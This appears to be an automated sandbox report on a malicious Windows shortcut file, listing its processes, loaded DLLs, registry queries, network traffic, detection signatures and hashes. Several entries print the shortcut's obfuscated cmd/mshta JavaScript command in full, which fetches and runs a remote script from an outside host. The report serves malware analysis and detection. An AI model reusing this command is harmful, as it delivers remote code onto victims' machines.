Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter
Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr	String found in binary or memory: https://wikis.world/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.217.192:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.7:49701 version: TLS 1.2

System Summary

Yara detected malicious lnk

Source: Yara match

File source: V_273686.Lnk.lnk, type: SAMPLE

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal68.troj.winLNK@4/1@2/2

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: V_273686.Lnk.lnk

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi>pG
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP}

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe

Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Jump to behavior

ID:	1446726
Product:	CloudBasic
Start time:	20:19:15
Start date:	23.05.2024
Sample:	V_273686.Lnk.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1dca9e98e575af3b1e2b90e59d75dc43
SHA1:	16cc510d884cae94137a9fbf90c4d2c0f0c5d2f1
SHA256:	a89872c21ac68096a76a60e5a13c77ddf79252c3097aea42865879c5b6d452f3
Filetype:	Windows Shortcut (20020/1) 100.00%

Windows Analysis Report
V_273686.Lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report V_273686.Lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
V_273686.Lnk.lnk